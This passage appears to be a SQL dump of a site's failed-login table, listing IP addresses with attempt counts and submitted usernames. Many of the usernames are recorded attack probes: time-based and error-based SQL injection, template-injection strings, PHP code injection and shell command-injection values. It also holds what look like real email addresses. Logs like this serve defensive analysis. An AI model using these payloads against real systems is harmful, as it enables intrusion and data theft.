('1', '81.30.192.218', 4, '2021-11-23 07:37:27'),
('1', '82.102.245.175', 3, '2021-11-23 03:14:53'),
('1', '82.116.49.241', 1, '2021-11-22 06:37:51'),
('1', '82.130.40.96', 2, '2022-02-13 06:16:12'),
('1', '82.57.38.71', 1, '2021-11-03 13:38:09'),
('1', '83.171.225.134', 1, '2024-02-27 21:35:42'),
('1', '83.176.180.89', 1, '2021-11-03 16:31:58'),
('1', '83.220.237.245', 1, '2021-11-22 03:54:54'),
('1', '83.23.161.148', 6, '2021-11-03 18:21:57'),
('1', '83.6.77.135', 2, '2021-11-03 20:44:43'),
('1', '84.42.4.33', 1, '2021-11-21 11:44:43'),
('1', '84.42.72.39', 2, '2021-11-22 18:33:01'),
('1', '84.42.73.23', 2, '2021-11-01 20:06:34'),
('1', '84.42.74.115', 1, '2021-11-21 13:50:27'),
('1', '84.42.76.6', 1, '2021-11-02 08:56:10'),
('1', '84.42.76.85', 1, '2021-11-04 06:26:05'),
('1', '84.54.51.31', 2, '2023-12-01 00:22:32'),
('1', '85.113.43.188', 1, '2021-11-22 13:55:03'),
('1', '85.159.0.44', 1, '2021-10-30 07:11:15'),
('1', '85.174.194.152', 1, '2021-11-03 18:58:22'),
('1', '85.221.135.220', 1, '2021-10-30 19:06:01'),
('1', '85.237.61.86', 8, '2021-11-22 01:17:44'),
('1', '85.71.56.174', 1, '2021-11-21 10:41:44'),
('1', '86.100.8.192', 1, '2021-11-21 13:00:42'),
('1', '86.108.34.221', 1, '2021-11-22 22:21:57'),
('1', '86.120.171.15', 3, '2021-11-22 19:08:56'),
('1', '86.125.52.112', 1, '2021-11-01 14:40:25'),
('1', '86.126.172.122', 1, '2021-10-28 09:53:26'),
('1', '86.129.30.15', 6, '2022-06-28 00:43:31'),
('1', '86.92.39.52', 6, '2021-11-03 18:22:10'),
('1', '87.14.144.139', 1, '2021-11-01 13:40:55'),
('1', '87.229.206.106', 12, '2021-11-20 19:01:44'),
('1', '87.249.207.129', 1, '2021-11-02 09:21:52'),
('1', '87.252.98.51', 1, '2021-11-22 05:34:49'),
('1', '88.102.77.89', 1, '2021-11-22 00:22:53'),
('1', '88.118.87.238', 1, '2021-10-30 18:02:19'),
('1', '88.156.131.104', 1, '2021-10-28 10:09:33'),
('1', '88.156.131.24', 1, '2021-11-03 15:43:59'),
('1', '88.156.131.9', 3, '2021-11-02 18:07:11'),
('1', '88.241.50.130', 2, '2021-11-22 17:40:05'),
('1', '88.87.91.194', 4, '2021-11-22 09:04:56'),
('1', '89.109.50.60', 3, '2021-11-02 17:08:38'),
('1', '89.113.127.210', 2, '2021-11-03 10:52:28'),
('1', '89.113.127.233', 1, '2021-10-27 10:44:10'),
('1', '89.147.110.118', 1, '2024-09-07 02:28:20'),
('1', '89.148.58.94', 1, '2021-11-22 18:43:43'),
('1', '89.151.34.240', 4, '2021-11-22 19:54:24'),
('1', '89.205.126.230', 1, '2021-10-30 05:39:11'),
('1', '89.252.16.130', 6, '2021-11-01 15:07:38'),
('1', '89.31.122.114', 1, '2025-09-04 20:53:30'),
('1', '89.39.81.18', 1, '2021-10-28 13:42:43'),
('1', '89.39.81.49', 1, '2021-11-03 13:37:47'),
('1', '89.39.81.6', 1, '2021-11-04 10:22:35'),
('1', '89.39.81.97', 1, '2021-11-01 13:02:52'),
('1', '89.68.182.95', 3, '2021-11-02 20:08:17'),
('1', '89.73.238.141', 1, '2021-11-21 10:48:26'),
('1', '89.82.94.242', 1, '2021-11-22 10:47:06'),
('1', '90.131.131.138', 1, '2021-10-28 12:05:06'),
('1', '90.150.96.222', 1, '2021-11-23 05:47:19'),
('1', '90.151.91.64', 1, '2021-11-22 05:32:12'),
('1', '91.139.173.40', 2, '2021-11-22 14:35:25'),
('1', '91.174.78.16', 1, '2021-11-22 03:59:52'),
('1', '91.189.166.224', 1, '2021-11-03 09:27:16'),
('1', '91.191.209.18', 4, '2026-03-24 18:32:51'),
('1', '91.193.121.218', 9, '2021-11-03 08:05:15'),
('1', '91.196.159.19', 1, '2021-11-22 08:09:17'),
('1', '91.198.130.151', 4, '2021-11-02 09:35:51'),
('1', '91.206.169.29', 1, '2026-02-02 11:22:05'),
('1', '91.214.85.232', 1, '2021-11-02 08:05:48'),
('1', '91.219.254.140', 2, '2021-11-22 18:37:00'),
('1', '91.220.163.57', 665, '2023-08-12 14:02:02'),
('1', '91.225.232.218', 1, '2021-11-22 19:03:22'),
('1', '91.226.140.3', 1, '2021-11-21 10:16:56'),
('1', '91.226.254.220', 3, '2021-11-04 09:17:06'),
('1', '91.234.199.74', 1, '2021-10-27 10:32:14'),
('1', '91.234.62.59', 6, '2021-11-23 01:08:27'),
('1', '91.246.15.8', 1, '2021-10-28 14:24:00'),
('1', '91.246.41.166', 4, '2025-11-14 13:30:37'),
('1', '91.92.242.226', 1000, '2026-01-24 07:03:57'),
('1', '91.92.242.74', 1, '2025-11-23 17:56:52'),
('1', '92.119.163.202', 2, '2022-04-01 15:49:17'),
('1', '92.119.163.219', 2, '2022-03-30 03:32:16'),
('1', '92.119.163.223', 4, '2022-03-29 03:40:44'),
('1', '92.119.163.231', 2, '2022-03-18 23:05:52'),
('1', '92.119.163.236', 5, '2022-04-07 09:46:57'),
('1', '92.119.163.251', 2, '2022-03-20 22:05:18'),
('1', '92.255.57.103', 32, '2025-03-29 22:18:06'),
('1', '92.38.192.36', 1, '2021-11-22 13:56:58'),
('1', '92.84.120.119', 1, '2021-10-28 09:57:47'),
('1', '92.90.112.79', 1, '2021-11-03 12:12:01'),
('1', '93.100.33.173', 1, '2023-09-26 17:59:54'),
('1', '93.170.65.49', 3, '2021-11-01 16:30:06'),
('1', '93.170.66.161', 1, '2021-11-02 09:36:14'),
('1', '93.171.214.219', 1, '2021-11-21 08:23:23'),
('1', '93.175.225.148', 1, '2021-11-21 19:02:50'),
('1', '93.72.112.26', 2, '2021-11-02 08:25:07'),
('1', '93.74.232.100', 2, '2021-11-21 18:11:58'),
('1', '94.103.9.69', 1, '2022-02-10 00:37:36'),
('1', '94.127.214.23', 1, '2022-02-21 17:06:56'),
('1', '94.142.244.16', 1, '2024-09-07 02:24:29'),
('1', '94.158.95.209', 4, '2021-11-22 08:31:56'),
('1', '94.159.35.158', 3, '2021-11-03 11:41:06'),
('1', '94.181.105.133', 2, '2021-11-21 16:44:34'),
('1', '94.232.233.230', 2, '2021-11-23 00:39:27'),
('1', '94.242.144.233', 2, '2021-11-02 10:07:43'),
('1', '94.25.168.20', 1, '2021-10-28 09:48:43'),
('1', '94.25.168.44', 1, '2021-10-27 12:26:54'),
('1', '94.25.170.109', 1, '2021-11-22 06:13:23'),
('1', '94.25.170.152', 1, '2021-11-22 04:50:54'),
('1', '94.25.171.166', 1, '2021-11-23 06:16:40'),
('1', '94.25.228.204', 2, '2021-11-02 19:42:09'),
('1', '94.25.228.33', 1, '2021-11-01 20:08:24'),
('1', '94.60.72.119', 1, '2021-11-21 17:55:01'),
('1', '95.105.124.105', 1, '2021-10-28 10:05:44'),
('1', '95.106.122.196', 1, '2021-10-30 10:28:17'),
('1', '95.106.29.106', 1, '2021-11-21 08:19:09'),
('1', '95.106.61.132', 1, '2021-11-02 15:55:02'),
('1', '95.153.161.201', 1, '2021-11-21 16:18:23'),
('1', '95.153.169.10', 1, '2021-11-21 16:28:17'),
('1', '95.168.116.160', 1, '2021-11-22 22:32:36'),
('1', '95.168.121.20', 1, '2021-11-03 18:53:46'),
('1', '95.168.121.31', 1, '2021-11-21 23:36:45'),
('1', '95.170.155.106', 5, '2021-11-23 02:05:04'),
('1', '95.174.119.4', 1, '2021-11-01 12:52:03'),
('1', '95.180.107.55', 2, '2021-11-01 19:00:55'),
('1', '95.252.240.22', 1, '2021-10-30 14:34:52'),
('1', '95.27.48.4', 1, '2021-11-02 06:13:31'),
('1', '95.27.70.161', 1, '2025-10-20 00:33:18'),
('1', '95.31.3.88', 2, '2021-11-22 19:37:17'),
('1', '95.47.123.193', 2, '2021-11-02 00:29:12'),
('1', '95.47.249.123', 1, '2021-10-28 11:59:03'),
('1', '95.58.89.20', 2, '2021-10-30 05:11:26'),
('1', '95.59.41.147', 1, '2021-11-01 04:57:25'),
('1', '95.64.65.123', 2, '2021-11-22 11:17:52'),
('1', '95.78.233.134', 1, '2021-11-01 05:01:35'),
('1', '95.79.38.35', 1, '2021-11-01 11:49:45'),
('1', '95.90.184.114', 1, '2021-11-01 18:08:03'),
('1', '98.124.36.64', 2, '2021-11-22 09:54:09'),
('1', '98.181.60.98', 6, '2025-11-19 23:19:17'),
('2', '#set($c=805053296+900625979)${c}$c', 1, '2023-10-19 04:15:29'),
('2', '#set($c=858805739+974889519)${c}$c', 1, '2023-10-19 04:28:50'),
('2', '#set($c=929769986+983576571)${c}$c', 1, '2022-12-05 21:03:47'),
('2', '#set($c=936307221+945950713)${c}$c', 1, '2023-10-19 04:29:42'),
('2', '#set($c=952537509+841322985)${c}$c', 1, '2023-10-19 04:32:22'),
('2', '#set($c=997703713+969447088)${c}$c', 1, '2023-10-19 04:33:39'),
('2', '${(835490020+827319095)?c}', 1, '2023-10-19 04:32:17'),
('2', '${(837207830+985959680)?c}', 1, '2023-10-19 04:28:43'),
('2', '${(851546682+980129053)?c}', 1, '2023-10-19 04:33:38'),
('2', '${(852697465+997432354)?c}', 1, '2023-10-19 04:15:25'),
('2', '${(896289166+969221197)?c}', 1, '2023-10-19 04:29:40'),
('2', '${(987031685+991433086)?c}', 1, '2022-12-05 21:03:44'),
('2', '${801413146+950493439}', 1, '2022-12-05 21:03:25'),
('2', '${840242312+978255624}', 1, '2023-10-19 04:14:44'),
('2', '${871853683+952243402}', 1, '2022-12-05 21:03:42'),
('2', '${874971345+815188501}', 1, '2023-10-19 04:28:29'),
('2', '${875706971+869565562}', 1, '2023-10-19 04:15:19'),
('2', '${890678716+803792493}', 1, '2023-10-19 04:32:56'),
('2', '${918358394+893286286}', 1, '2023-10-19 04:28:54'),
('2', '${961348888+970815215}', 1, '2023-10-19 04:28:39'),
('2', '${969299988+827986818}', 1, '2023-10-19 04:32:14'),
('2', '${982378838+973406380}', 1, '2023-10-19 04:33:36'),
('2', '${984317988+919629755}', 1, '2023-08-15 09:29:19'),
('2', '${985429695+823267015}', 1, '2023-10-19 04:31:46'),
('2', '${991622355+975475364}', 1, '2023-10-19 04:29:36'),
('2', '${@var_dump(md5(133249355))};', 1, '2023-10-19 04:33:09'),
('2', '${@var_dump(md5(187259690))};', 1, '2023-10-19 04:28:34'),
('2', '${@var_dump(md5(300702254))};', 1, '2023-10-19 04:15:09'),
('2', '${@var_dump(md5(303685950))};', 1, '2023-10-19 04:28:15'),
('2', '${@var_dump(md5(415906055))};', 1, '2023-08-15 09:29:08'),
('2', '${@var_dump(md5(556729100))};', 1, '2023-10-19 04:31:36'),
('2', '${@var_dump(md5(930683176))};', 1, '2022-12-05 21:03:34'),
('2', '\'-var_dump(md5(156358058))-\'', 1, '2023-10-19 04:15:14'),
('2', '\'-var_dump(md5(240012328))-\'', 1, '2023-08-15 09:29:14'),
('2', '\'-var_dump(md5(259203147))-\'', 1, '2023-10-19 04:28:38'),
('2', '\'-var_dump(md5(277828547))-\'', 1, '2022-12-05 21:03:36'),
('2', '\'-var_dump(md5(543828919))-\'', 1, '2023-10-19 04:28:20'),
('2', '\'-var_dump(md5(853771349))-\'', 1, '2023-10-19 04:31:39'),
('2', '\'-var_dump(md5(976039387))-\'', 1, '2023-10-19 04:33:14'),
('2', '(select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/', 14, '2025-03-08 12:03:36'),
('2', '-1 OR 2+117-117-1=0+0+0+1', 1, '2025-03-08 11:28:42'),
('2', '-1 OR 2+130-130-1=0+0+0+1 -- ', 1, '2023-08-12 12:42:34'),
('2', '-1 OR 2+173-173-1=0+0+0+1', 1, '2023-08-12 11:31:37'),
('2', '-1 OR 2+229-229-1=0+0+0+1', 1, '2025-03-08 11:49:30'),
('2', '-1 OR 2+246-246-1=0+0+0+1 -- ', 1, '2025-03-08 11:49:18'),
('2', '-1 OR 2+263-263-1=0+0+0+1', 1, '2025-03-08 11:22:01'),
('2', '-1 OR 2+299-299-1=0+0+0+1 -- ', 1, '2023-08-12 11:11:49'),
('2', '-1 OR 2+302-302-1=0+0+0+1', 1, '2025-03-08 11:59:45'),
('2', '-1 OR 2+316-316-1=0+0+0+1 -- ', 1, '2023-08-12 08:34:09'),
('2', '-1 OR 2+329-329-1=0+0+0+1 -- ', 1, '2023-08-12 11:31:36'),
('2', '-1 OR 2+336-336-1=0+0+0+1 -- ', 1, '2025-03-08 11:28:40'),
('2', '-1 OR 2+382-382-1=0+0+0+1', 1, '2025-03-08 12:00:35'),
('2', '-1 OR 2+387-387-1=0+0+0+1 -- ', 1, '2023-08-12 12:19:40'),
('2', '-1 OR 2+401-401-1=0+0+0+1 -- ', 1, '2023-08-12 11:23:18'),
('2', '-1 OR 2+410-410-1=0+0+0+1', 1, '2023-08-12 11:11:52'),
('2', '-1 OR 2+436-436-1=0+0+0+1 -- ', 1, '2025-03-08 11:21:58'),
('2', '-1 OR 2+443-443-1=0+0+0+1', 1, '2023-08-12 13:58:46'),
('2', '-1 OR 2+499-499-1=0+0+0+1 -- ', 1, '2023-08-12 13:58:45'),
('2', '-1 OR 2+526-526-1=0+0+0+1 -- ', 1, '2025-03-08 12:00:33'),
('2', '-1 OR 2+600-600-1=0+0+0+1 -- ', 1, '2025-03-08 11:59:43'),
('2', '-1 OR 2+644-644-1=0+0+0+1 -- ', 1, '2025-03-08 11:49:29'),
('2', '-1 OR 2+649-649-1=0+0+0+1', 1, '2023-08-12 12:42:39'),
('2', '-1 OR 2+740-740-1=0+0+0+1', 1, '2023-08-12 12:19:41'),
('2', '-1 OR 2+755-755-1=0+0+0+1 -- ', 1, '2023-08-12 13:31:07'),
('2', '-1 OR 2+789-789-1=0+0+0+1', 1, '2023-08-12 13:31:09'),
('2', '-1 OR 2+884-884-1=0+0+0+1', 1, '2023-08-12 08:34:11'),
('2', '-1 OR 2+906-906-1=0+0+0+1', 1, '2023-08-12 11:23:19'),
('2', '-1 OR 2+974-974-1=0+0+0+1', 1, '2025-03-08 11:49:20'),
('2', '-1\" OR 2+186-186-1=0+0+0+1 -- ', 1, '2025-03-08 11:49:24'),
('2', '-1\" OR 2+189-189-1=0+0+0+1 -- ', 1, '2025-03-08 12:00:41'),
('2', '-1\" OR 2+200-200-1=0+0+0+1 -- ', 1, '2023-08-12 11:31:40'),
('2', '-1\" OR 2+271-271-1=0+0+0+1 -- ', 1, '2023-08-12 11:23:26'),
('2', '-1\" OR 2+337-337-1=0+0+0+1 -- ', 1, '2023-08-12 13:58:59'),
('2', '-1\" OR 2+387-387-1=0+0+0+1 -- ', 1, '2023-08-12 13:31:13'),
('2', '-1\" OR 2+478-478-1=0+0+0+1 -- ', 1, '2023-08-12 08:34:24'),
('2', '-1\" OR 2+519-519-1=0+0+0+1 -- ', 1, '2023-08-12 12:42:59'),
('2', '-1\" OR 2+666-666-1=0+0+0+1 -- ', 2, '2025-03-08 11:28:46'),
('2', '-1\" OR 2+711-711-1=0+0+0+1 -- ', 1, '2025-03-08 11:49:35'),
('2', '-1\" OR 2+755-755-1=0+0+0+1 -- ', 1, '2023-08-12 11:12:06'),
('2', '-1\" OR 2+799-799-1=0+0+0+1 -- ', 1, '2025-03-08 11:22:06'),
('2', '-1\" OR 2+884-884-1=0+0+0+1 -- ', 1, '2025-03-08 11:59:49'),
('2', '-1\' OR 2+150-150-1=0+0+0+1 or \'D2Nks4P2\'=\'', 1, '2025-03-08 12:00:39'),
('2', '-1\' OR 2+210-210-1=0+0+0+1 or \'Zd45iJgV\'=\'', 1, '2025-03-08 11:22:05'),
('2', '-1\' OR 2+221-221-1=0+0+0+1 or \'ibfLWVHY\'=\'', 1, '2023-08-12 08:34:21'),
('2', '-1\' OR 2+254-254-1=0+0+0+1 or \'OL5LF4BF\'=\'', 1, '2025-03-08 11:59:47'),
('2', '-1\' OR 2+262-262-1=0+0+0+1 -- ', 1, '2023-08-12 12:19:42'),
('2', '-1\' OR 2+279-279-1=0+0+0+1 -- ', 1, '2023-08-12 13:58:50'),
('2', '-1\' OR 2+332-332-1=0+0+0+1 -- ', 1, '2023-08-12 11:23:24'),
('2', '-1\' OR 2+377-377-1=0+0+0+1 -- ', 1, '2025-03-08 12:00:36'),
('2', '-1\' OR 2+51-51-1=0+0+0+1 -- ', 1, '2025-03-08 11:49:21'),
('2', '-1\' OR 2+512-512-1=0+0+0+1 -- ', 1, '2025-03-08 11:22:03'),
('2', '-1\' OR 2+570-570-1=0+0+0+1 -- ', 1, '2025-03-08 11:59:46'),
('2', '-1\' OR 2+580-580-1=0+0+0+1 -- ', 1, '2023-08-12 11:31:38'),
('2', '-1\' OR 2+604-604-1=0+0+0+1 or \'QQWXwQot\'=\'', 1, '2025-03-08 11:28:44'),
('2', '-1\' OR 2+62-62-1=0+0+0+1 -- ', 1, '2023-08-12 11:11:58'),
('2', '-1\' OR 2+623-623-1=0+0+0+1 or \'rEVBW2lK\'=\'', 1, '2023-08-12 11:23:25'),
('2', '-1\' OR 2+631-631-1=0+0+0+1 or \'CNhsbqHb\'=\'', 1, '2023-08-12 13:31:12'),
('2', '-1\' OR 2+669-669-1=0+0+0+1 -- ', 1, '2023-08-12 08:34:14'),
('2', '-1\' OR 2+703-703-1=0+0+0+1 -- ', 1, '2025-03-08 11:28:43'),
('2', '-1\' OR 2+707-707-1=0+0+0+1 or \'Oxn6bsmG\'=\'', 1, '2025-03-08 11:49:33'),
('2', '-1\' OR 2+737-737-1=0+0+0+1 -- ', 1, '2023-08-12 12:42:44'),
('2', '-1\' OR 2+76-76-1=0+0+0+1 -- ', 1, '2025-03-08 11:49:32'),
('2', '-1\' OR 2+798-798-1=0+0+0+1 or \'aKRRcTL5\'=\'', 1, '2025-03-08 11:49:22'),
('2', '-1\' OR 2+803-803-1=0+0+0+1 or \'zhHrA865\'=\'', 1, '2023-08-12 13:58:57'),
('2', '-1\' OR 2+84-84-1=0+0+0+1 -- ', 1, '2023-08-12 13:31:10'),
('2', '-1\' OR 2+886-886-1=0+0+0+1 or \'dV0lOqHq\'=\'', 1, '2023-08-12 11:12:04'),
('2', '-1\' OR 2+929-929-1=0+0+0+1 or \'r7R8kn8Z\'=\'', 1, '2023-08-12 12:42:48'),
('2', '-1\' OR 2+958-958-1=0+0+0+1 or \'mRQnnb7A\'=\'', 1, '2023-08-12 12:19:44'),
('2', '-1\' OR 2+97-97-1=0+0+0+1 or \'8FaT1s9v\'=\'', 1, '2023-08-12 11:31:39'),
('2', '-1)) OR 151=(SELECT 151 FROM PG_SLEEP(15))--', 1, '2025-03-08 11:57:13'),
('2', '-1)) OR 790=(SELECT 790 FROM PG_SLEEP(15))--', 1, '2025-03-08 12:08:35'),
('2', '-1); waitfor delay \'0:0:15\' -- ', 2, '2025-03-08 12:04:57'),
('2', '-1; waitfor delay \'0:0:15\' -- ', 2, '2025-03-08 12:04:17'),
('2', '-5 OR 389=(SELECT 389 FROM PG_SLEEP(15))--', 1, '2025-03-08 12:07:09'),
('2', '-5 OR 832=(SELECT 832 FROM PG_SLEEP(15))--', 1, '2025-03-08 11:55:42'),
('2', '-5) OR 587=(SELECT 587 FROM PG_SLEEP(15))--', 1, '2025-03-08 11:56:23'),
('2', '-5) OR 890=(SELECT 890 FROM PG_SLEEP(15))--', 1, '2025-03-08 12:07:51'),
('2', '/*1*/{{802419176+905841102}}', 1, '2023-10-19 04:29:32'),
('2', '/*1*/{{803272254+905049633}}', 1, '2022-12-05 21:03:40'),
('2', '/*1*/{{815701929+930808404}}', 1, '2023-10-19 04:28:35'),
('2', '/*1*/{{831171198+814295262}}', 1, '2023-10-19 04:15:14'),
('2', '/*1*/{{910610087+800270821}}', 1, '2023-10-19 04:33:35'),
('2', '/*1*/{{966125045+949172275}}', 1, '2023-10-19 04:32:12'),
('2', '0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z', 14, '2025-03-08 12:02:51'),
('2', '0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z', 14, '2025-03-08 12:02:09'),
('2', '0101design', 11, '2024-10-08 03:38:04'),
('2', '0jCDKe1z\' OR 416=(SELECT 416 FROM PG_SLEEP(15))--', 1, '2023-08-12 08:34:54'),
('2', '1\0????%2527%2522', 8, '2023-08-12 14:00:10'),
('2', '1', 7, '2025-03-29 21:35:18'),
('2', '1 waitfor delay \'0:0:15\' -- ', 14, '2025-03-08 12:05:45'),
('2', '1\'\"', 8, '2023-08-12 14:00:09'),
('2', '1\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'', 2, '2025-03-08 12:12:10'),
('2', '1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)', 2, '2025-03-08 12:11:28'),
('2', '123456', 2, '2026-02-12 03:54:28'),
('2', '1Cjhz55w\')) OR 724=(SELECT 724 FROM PG_SLEEP(15))--', 1, '2023-08-12 08:35:01'),
('2', '1Tb9zg5I\')) OR 25=(SELECT 25 FROM PG_SLEEP(15))--', 1, '2023-08-12 12:20:03'),
('2', '2KmGhLIn\') OR 732=(SELECT 732 FROM PG_SLEEP(15))--', 1, '2023-08-12 13:59:54'),
('2', '2rB5MUrF\')) OR 375=(SELECT 375 FROM PG_SLEEP(15))--', 1, '2025-03-08 11:55:30'),
('2', '3NMo5PXg\' OR 437=(SELECT 437 FROM PG_SLEEP(15))--', 1, '2023-08-12 12:20:01'),
('2', '54alexanderrose@gmail.com', 5, '2022-06-04 23:09:38'),
('2', '7877bG1u\')) OR 218=(SELECT 218 FROM PG_SLEEP(15))--', 1, '2025-03-08 12:06:52'),
('2', '7EsETanv\') OR 143=(SELECT 143 FROM PG_SLEEP(15))--', 1, '2025-03-08 11:27:42'),
('2', '9wu1rzbR\')) OR 601=(SELECT 601 FROM PG_SLEEP(15))--', 1, '2025-03-08 11:34:47'),
('2', '<%- 851698550+837069637 %>', 1, '2022-12-05 21:03:50'),
('2', '<%- 856668937+852960655 %>', 1, '2023-10-19 04:33:40'),
('2', '<%- 935167800+836816904 %>', 1, '2023-10-19 04:29:45'),
('2', '<%- 950686482+943982295 %>', 1, '2023-10-19 04:32:24'),
('2', '<%- 961636603+874781073 %>', 1, '2023-10-19 04:15:34'),
('2', '<%- 965880489+823188443 %>', 1, '2023-10-19 04:28:57'),
('2', '@@2UnhE', 1, '2023-08-12 11:32:06'),
('2', '@@42ath', 1, '2023-08-12 11:24:06'),
('2', '@@5NPlj', 1, '2023-08-12 12:20:10'),
('2', '@@EZzh1', 1, '2023-08-12 11:13:24'),
('2', '@@QM9tm', 1, '2023-08-12 14:00:10'),
('2', '@@UCOUl', 1, '2023-08-12 12:43:49'),
('2', '@@y0LRT', 1, '2023-08-12 13:31:54'),
('2', '@@zNdNe', 1, '2023-08-12 08:35:10'),
('2', 'A6AHGifS\') OR 47=(SELECT 47 FROM PG_SLEEP(15))--', 1, '2025-03-08 11:34:08'),
('2', 'Aannaedonnaey7797@gmail.com', 10, '2022-05-05 22:25:59'),
('2', 'aaron', 1, '2023-04-11 09:48:44'),
('2', 'abdolahahmadi5289@gmail.com', 12, '2022-04-02 08:04:59'),
('2', 'ac316995@gmail.com', 4, '2022-03-21 09:40:12'),
('2', 'accounts', 11, '2024-10-08 03:36:57'),
('2', 'adeel', 11, '2024-10-08 03:41:10'),
('2', 'adm', 58, '2024-07-05 03:13:00'),
('2', 'admin\nexpr 872273613 + 811931385\n', 1, '2023-10-19 04:32:17'),
('2', 'admin\nexpr 899948178 + 987503336\n', 1, '2023-10-19 04:15:12'),
('2', 'admin\nexpr 935432128 + 950335530\n', 1, '2022-12-05 21:03:49'),
('2', 'admin\nexpr 944461307 + 949375004\n', 1, '2023-10-19 04:29:37'),
('2', 'admin\nexpr 951383374 + 898934301\n', 1, '2023-08-15 09:30:41'),
('2', 'admin\nexpr 952633508 + 922273575\n', 1, '2023-10-19 04:29:04'),
('2', 'admin\nexpr 963567515 + 824567358\n', 1, '2023-10-19 04:32:56'),
('2', 'admin', 748, '2026-03-24 18:32:51'),
('2', 'admin\"and\"a\"=\"p', 1, '2023-10-19 04:32:30'),
('2', 'admin\"and\"d\"=\"d', 1, '2023-10-19 04:15:15'),
('2', 'admin\"and\"e\"=\"e', 1, '2023-10-19 04:30:22'),
('2', 'admin\"and\"h\"=\"z', 1, '2023-10-19 04:30:24'),
('2', 'admin\"and\"l\"=\"i', 1, '2022-12-05 21:03:42'),
('2', 'admin\"and\"n\"=\"n', 1, '2023-10-19 04:29:55'),
('2', 'admin\"and\"o\"=\"o', 1, '2023-10-19 04:29:54'),
('2', 'admin\"and\"r\"=\"g', 1, '2023-08-15 09:32:50'),
('2', 'admin\"and\"r\"=\"r', 1, '2023-08-15 09:32:38'),
('2', 'admin\"and\"t\"=\"t', 1, '2023-10-19 04:32:29'),
('2', 'admin\"and\"u\"=\"r', 1, '2023-10-19 04:33:11'),
('2', 'admin\"and\"v\"=\"v', 1, '2022-12-05 21:03:39'),
('2', 'admin\"and\"y\"=\"x', 1, '2023-10-19 04:15:19'),
('2', 'admin\"and\"z\"=\"z', 1, '2023-10-19 04:33:11'),
('2', 'admin\"and(select*from(select+sleep(0))a/**/union/**/select+1)=\"', 7, '2023-10-19 04:33:27'),
('2', 'admin\"and(select*from(select+sleep(10))a/**/union/**/select+1)=\"', 1, '2023-10-19 04:32:33'),
('2', 'admin\"and(select*from(select+sleep(5))a/**/union/**/select+1)=\"', 1, '2023-10-19 04:15:49'),
('2', 'admin\"and(select*from(select+sleep(6))a/**/union/**/select+1)=\"', 3, '2023-10-19 04:33:30'),
('2', 'admin\"and(select*from(select+sleep(7))a/**/union/**/select+1)=\"', 2, '2023-10-19 04:30:29'),
('2', 'admin\"and/**/extractvalue(1,concat(char(126),md5(1149502774)))and\"', 1, '2023-10-19 04:28:35'),
('2', 'admin\"and/**/extractvalue(1,concat(char(126),md5(1188323989)))and\"', 1, '2023-10-19 04:30:15'),
('2', 'admin\"and/**/extractvalue(1,concat(char(126),md5(1460299018)))and\"', 1, '2023-10-19 04:32:25'),
('2', 'admin\"and/**/extractvalue(1,concat(char(126),md5(1530571435)))and\"', 1, '2023-10-19 04:15:10'),
('2', 'admin\"and/**/extractvalue(1,concat(char(126),md5(1557242200)))and\"', 1, '2022-12-05 21:04:17'),
('2', 'admin\"and/**/extractvalue(1,concat(char(126),md5(1571094244)))and\"', 1, '2023-08-15 09:31:04'),
('2', 'admin\"and/**/extractvalue(1,concat(char(126),md5(1684732729)))and\"', 1, '2023-10-19 04:33:32'),
('2', 'admin$(expr 831191104 + 856302012)', 1, '2023-10-19 04:32:19'),
('2', 'admin$(expr 902378463 + 843600686)', 1, '2023-10-19 04:15:20'),
('2', 'admin$(expr 932397956 + 932378989)', 1, '2023-08-15 09:30:53'),
('2', 'admin$(expr 951016333 + 924685096)', 1, '2022-12-05 21:03:52'),
('2', 'admin$(expr 957240117 + 836602075)', 1, '2023-10-19 04:29:43'),
('2', 'admin$(expr 975795111 + 933733376)', 1, '2023-10-19 04:29:15'),
('2', 'admin$(expr 993336897 + 939222716)', 1, '2023-10-19 04:33:09'),
('2', 'admin&set /A 800872463+976269068', 1, '2023-10-19 04:33:11'),
('2', 'admin&set /A 824918898+971436832', 1, '2023-10-19 04:29:23'),
('2', 'admin&set /A 846065088+916524023', 1, '2023-10-19 04:29:46'),
('2', 'admin&set /A 855091012+967618264', 1, '2023-10-19 04:15:26'),
('2', 'admin&set /A 912971249+919675095', 1, '2023-10-19 04:32:21'),
('2', 'admin&set /A 936399779+995461955', 1, '2022-12-05 21:03:54'),
('2', 'admin&set /A 993508587+997099612', 1, '2023-08-15 09:30:57'),
('2', 'admin\'\"\\(', 7, '2023-10-19 04:33:44'),
('2', 'admin\'/**/and(select\'1\'from/**/pg_sleep(0))::text>\'0', 7, '2023-10-19 04:33:31'),
('2', 'admin\'/**/and(select\'1\'from/**/pg_sleep(10))::text>\'0', 1, '2023-10-19 04:32:36'),
('2', 'admin\'/**/and(select\'1\'from/**/pg_sleep(5))::text>\'0', 1, '2023-10-19 04:15:58'),
('2', 'admin\'/**/and(select\'1\'from/**/pg_sleep(6))::text>\'0', 3, '2023-10-19 04:33:34'),
('2', 'admin\'/**/and(select\'1\'from/**/pg_sleep(7))::text>\'0', 2, '2023-10-19 04:30:32'),
('2', 'admin\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'a\',0)=\'a', 1, '2023-10-19 04:30:11'),
('2', 'admin\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'d\',0)=\'d', 1, '2022-12-05 21:04:11'),
('2', 'admin\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'g\',7)=\'g', 1, '2023-10-19 04:30:14'),
('2', 'admin\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'h\',6)=\'h', 2, '2023-08-15 09:34:36'),
('2', 'admin\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'i\',0)=\'i', 1, '2023-10-19 04:33:40'),
('2', 'admin\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'i\',10)=\'i', 1, '2023-10-19 04:32:40'),
('2', 'admin\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'m\',5)=\'m', 1, '2023-10-19 04:16:19'),
('2', 'admin\'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE(\'p\',6)=\'p', 1, '2023-10-19 04:33:41'),
